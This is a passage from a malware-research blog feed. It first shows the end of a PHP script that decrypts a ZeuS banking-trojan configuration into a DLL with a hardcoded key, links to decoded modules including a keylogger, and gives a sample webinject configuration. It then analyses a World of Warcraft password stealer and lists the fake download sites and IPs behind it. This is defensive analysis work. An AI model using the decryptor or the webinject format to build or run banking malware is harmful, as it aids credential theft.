&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #009900;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: black; font-weight: bold;&quot;&gt;function&lt;/span&gt; visualDecrypt&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;&amp;amp;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$len&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/strlen&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;strlen&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$len&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #b1b100;&quot;&gt;for&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$i&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$len&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$i&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$i&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;--&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$i&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;]&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/chr&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;chr&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;a href=&quot;http://www.php.net/ord&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;ord&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$i&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;]&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt; ^ &lt;a href=&quot;http://www.php.net/ord&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;ord&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$i&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;-&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;]&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #009900;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt; &amp;nbsp; &amp;nbsp;&lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/file_get_contents&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;file_get_contents&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;config.bin&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$key&lt;/span&gt; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/md5&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;md5&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;hasd7h12g1&#39;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #009900; font-weight: bold;&quot;&gt;true&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$decoded&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; decode&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$key&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; visualDecrypt&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$decoded&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$size&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/strlen&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;strlen&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$decoded&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Content-Type: application/octet-stream;&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Content-Transfer-Encoding: binary&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Content-Length: &#39;&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$size&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Content-Disposition: attachment; filename=config_decrypted.dll&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Expires: 0&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Cache-Control: no-cache, must-revalidate&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/header&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;header&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;&#39;Pragma: no-cache&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #b1b100;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$decoded&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/exit&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;exit&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt; &lt;br /&gt;
&lt;span style=&quot;color: black; font-weight: bold;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
You can find the decoded modules here:&lt;br /&gt;
JAVA: &lt;a href=&quot;https://www.virustotal.com/en/file/d8e3cad3a831ef3325c6fdf1640fa09b9f9ae9c1caff7f0aff5196057a98fd09/analysis/1389194044/&quot;&gt;7d7ae6ffbd9f3c7673b339f9b94493e5&lt;/a&gt;&lt;br /&gt;
BSS: &lt;a href=&quot;https://www.virustotal.com/en/file/2b7e5567984217e9c484896baed2df083ceea98d45d003c4a96775cf7d7d8694/analysis/1389194046/&quot;&gt;cc98dabebe047c6115a6cd9d13ed3122&lt;/a&gt;&lt;br /&gt;
KEYLOG: &lt;a href=&quot;https://www.virustotal.com/en/file/5ca8eaf746881093764c4ace675e2c935a35c87eb9411b95b53d78f09f93d7cb/analysis/1389194047/&quot;&gt;8ac1c7c019d16ff3b8a9543d46ae5e0e&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
And if you want to test yourself the WebInject, i usually use this code:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
set_url http://requesttests.appspot.com* GP&lt;br /&gt;
data_before&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
data_end&lt;br /&gt;
&lt;br /&gt;
data_inject&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;img src=&quot;http://temari.fr/webinject.png&quot; alt=&quot;Injected!&quot;&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
data_end&lt;br /&gt;
&lt;br /&gt;
data_after&lt;br /&gt;
data_end&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZnX5v7RW6O0yMHcjUlPtcPi9cPc5IC6sG_AcHR8kJnQFhXumhSO2TU-SXT7agRTiBCQW8CplaKIjjJXk9pqrzslkRY-P05SdoqfvQKc6wABDsTqoIpuz04ERGw30C1NSOsnsIvfaUSE/s1600/11-01-2014+18-12-53.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnZnX5v7RW6O0yMHcjUlPtcPi9cPc5IC6sG_AcHR8kJnQFhXumhSO2TU-SXT7agRTiBCQW8CplaKIjjJXk9pqrzslkRY-P05SdoqfvQKc6wABDsTqoIpuz04ERGw30C1NSOsnsIvfaUSE/s1600/11-01-2014+18-12-53.png&quot; height=&quot;226&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
/facepalm</description><link>https://www.xylibox.com/2014/01/decoding-zeus-2961-config.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-XfLKAVlZNV2wypPwWNQ2mNl57CEKvEfxb67CdkXKcKm-ngjohPADb2zSHU5EjnJ0k8ur6HokiF99t8ATvmiL1E0lcOQ6CdsnfcaM1jdg6cYLlyKVhHN1dknRHOXzDMWhhU7Y7OmQemM/s72-c/11-01-2014+14-53-52.png" height="72" width="72"/><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3340813665357730857</guid><pubDate>Fri, 10 Jan 2014 00:10:00 +0000</pubDate><atom:updated>2014-01-10T01:20:21.526+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">142.4.105.98</category><category domain="http://www.blogger.com/atom/ns#">142.4.105.99</category><category domain="http://www.blogger.com/atom/ns#">curse.pw</category><category domain="http://www.blogger.com/atom/ns#">Disker</category><category domain="http://www.blogger.com/atom/ns#">Mal/DllHook-A</category><category domain="http://www.blogger.com/atom/ns#">stealer</category><category domain="http://www.blogger.com/atom/ns#">Troj/WowSpy-A</category><category domain="http://www.blogger.com/atom/ns#">Trojan.Siggen5.64266</category><category domain="http://www.blogger.com/atom/ns#">World Of Warcraft</category><category domain="http://www.blogger.com/atom/ns#">wowmatrix.pw</category><category domain="http://www.blogger.com/atom/ns#">wowmatrix.pw.pw</category><title>Troj/WowSpy-A</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Recently a malware who target World of Warcraft got identified.&lt;br /&gt;
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use a Battle.net Authenticator.&lt;br /&gt;
Yes, this is another post about password stealer mawlare... &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMWTxLW7aG_9SFBQCQHzaY3zMXL5Aj7JTw8HOZMdI1Km4gYCogiMMOP3dtEAsdt8BDapAwLru_EtGCBSm1enK-khvvbbLyfh_BLEzw5ykhoN43IQHhdkJmu4peCXuCrm1YbNf7MCIYOM/s1600/10-01-2014+00-55-11.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLMWTxLW7aG_9SFBQCQHzaY3zMXL5Aj7JTw8HOZMdI1Km4gYCogiMMOP3dtEAsdt8BDapAwLru_EtGCBSm1enK-khvvbbLyfh_BLEzw5ykhoN43IQHhdkJmu4peCXuCrm1YbNf7MCIYOM/s1600/10-01-2014+00-55-11.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;There is no option to retain password on the WoW client.&lt;br /&gt;
&lt;br /&gt;
The method used to spread this malware is by fake websites leading to malicious download.&lt;br /&gt;
The Trojan is bundled with legit programs such as WowMatrix or Curse Client, used by players to manage their AddOns.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDA-QxrB7idc_Ai6HEw1N7ukqmYgH1zpYR70XVBEvmhwlrQkB70F2gZTQBdxjWJrPkG6mu34YA96P0wbR-KdpquDPgw4ld1_eTFDjT6bbXVyCfudMu0m3ugY6dmhlrk2JGNlpJEffizZU/s1600/07-01-2014+03-20-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDA-QxrB7idc_Ai6HEw1N7ukqmYgH1zpYR70XVBEvmhwlrQkB70F2gZTQBdxjWJrPkG6mu34YA96P0wbR-KdpquDPgw4ld1_eTFDjT6bbXVyCfudMu0m3ugY6dmhlrk2JGNlpJEffizZU/s1600/07-01-2014+03-20-13.png&quot; height=&quot;256&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Malicious Wowmatrix installer. (&lt;a href=&quot;http://vxvault.siri-urz.net/ViriFiche.php?ID=25520&quot;&gt;DCDD6986941B2B4E78A558CAB3ACF337&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Fake sites:&lt;br /&gt;
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.CURSE.PW&lt;br /&gt;
• dns: 1 ›› ip: 142.4.105.98 - adress: WWW.WOWMATRIX.PW&lt;br /&gt;
• dns: 1 ›› ip: 142.4.105.99 - adress: WWW.WOWMATRIX.PW.PW&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Blizzard released a statement due to this new threat:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFa6pVVN1PxU9Rj6IM1I8zVOMFzNvMHrrW62ssvn_m1tuvOKBlIXzZ__ehAhp0gO76qvLUmotY3CK9ZmMnF1H9MheILL_04EpzNLY1dukKrtzMlBdVZctjS5ypPlXjHmLAlxwv5g9b0nk/s1600/06-01-2014+22-32-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFa6pVVN1PxU9Rj6IM1I8zVOMFzNvMHrrW62ssvn_m1tuvOKBlIXzZ__ehAhp0gO76qvLUmotY3CK9ZmMnF1H9MheILL_04EpzNLY1dukKrtzMlBdVZctjS5ypPlXjHmLAlxwv5g9b0nk/s1600/06-01-2014+22-32-01.png&quot; height=&quot;286&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I don&#39;t know how work the dll for the moment (at least a bit)&lt;br /&gt;
My debugger got some stability issue when handling wow.exe but i will get back on this, the mechanism seem interesting (and they even use OutputDebugString!).&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihn_ZMAX809T6npAZ5Ubh_sTd0R0KCT3QHso0cUsvI40iwrdUEFcOphQXnLRvQeOFwLluCryt7O-pFKLR2pAAIwfdiCygzYIsLJ18St-pxSIx0HNhuLx6_acIuhovb3sRaNyP0bRLUVe4/s1600/07-01-2014+00-29-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihn_ZMAX809T6npAZ5Ubh_sTd0R0KCT3QHso0cUsvI40iwrdUEFcOphQXnLRvQeOFwLluCryt7O-pFKLR2pAAIwfdiCygzYIsLJ18St-pxSIx0HNhuLx6_acIuhovb3sRaNyP0bRLUVe4/s1600/07-01-2014+00-29-18.png&quot; height=&quot;308&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
Network trafic after login in:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbG2Qmi8f_yil8q7MU7Zp_CR8j18HjZjuPBdSbcAr_z4xtTWNpAHeeql-Nf3p3XNdjNua1RDDuBoh4fiFMGFsGlqKf6f2CfffeMhPpMKWuV54jVjg1sYmcNOQAXDpyDHFAjtIEcO7wNI/s1600/06-01-2014+20-47-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisbG2Qmi8f_yil8q7MU7Zp_CR8j18HjZjuPBdSbcAr_z4xtTWNpAHeeql-Nf3p3XNdjNua1RDDuBoh4fiFMGFsGlqKf6f2CfffeMhPpMKWuV54jVjg1sYmcNOQAXDpyDHFAjtIEcO7wNI/s1600/06-01-2014+20-47-14.png&quot; height=&quot;188&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
C&amp;amp;C (in Chinese):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuiBBk6BiTw97ZzSRqoRPcKsdeW5H7AnnUjVGj9V5JzraSk5Tpd_LVLd7yj49LklivqZPd0lZIDOGqvNlGF2VWcdeUOJiLhYdpkuWUUsCEbFvpIsN0Hz-eKoKNLS8d8l4VHHMExqfZSXI/s1600/06-01-2014+12-05-39.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuiBBk6BiTw97ZzSRqoRPcKsdeW5H7AnnUjVGj9V5JzraSk5Tpd_LVLd7yj49LklivqZPd0lZIDOGqvNlGF2VWcdeUOJiLhYdpkuWUUsCEbFvpIsN0Hz-eKoKNLS8d8l4VHHMExqfZSXI/s1600/06-01-2014+12-05-39.png&quot; height=&quot;400&quot; width=&quot;316&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Compromised accounts:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVbTS7wMb3MAdqNEkOy3kf0QPXeK1iZ2QdU24xoV9vkT5mgfC9yoAC37fO-sREk0ZvKwd6gjLtKVH7onhbPxph48o2mpfhhaFKaeVM0Di1x4tBCZCG4RQ89uk_DjmTGITEQnFAZK3PjqQ/s1600/06-01-2014+04-12-28_b.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVbTS7wMb3MAdqNEkOy3kf0QPXeK1iZ2QdU24xoV9vkT5mgfC9yoAC37fO-sREk0ZvKwd6gjLtKVH7onhbPxph48o2mpfhhaFKaeVM0Di1x4tBCZCG4RQ89uk_DjmTGITEQnFAZK3PjqQ/s1600/06-01-2014+04-12-28_b.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZFLO3becbFuw2H6-vS98YVZVrALyYuBjMXcGYB2r8OqX8c17pHfsMueTUHu-FXowBxPeBzCJFwKFm7TLJSqZpyWoptePCTYTaV50oZZa0boaBw4gZI6zT0oMTfwkIySiLCsx1dcdEQ1k/s1600/06-01-2014+04-34-48_b.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZFLO3becbFuw2H6-vS98YVZVrALyYuBjMXcGYB2r8OqX8c17pHfsMueTUHu-FXowBxPeBzCJFwKFm7TLJSqZpyWoptePCTYTaV50oZZa0boaBw4gZI6zT0oMTfwkIySiLCsx1dcdEQ1k/s1600/06-01-2014+04-34-48_b.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
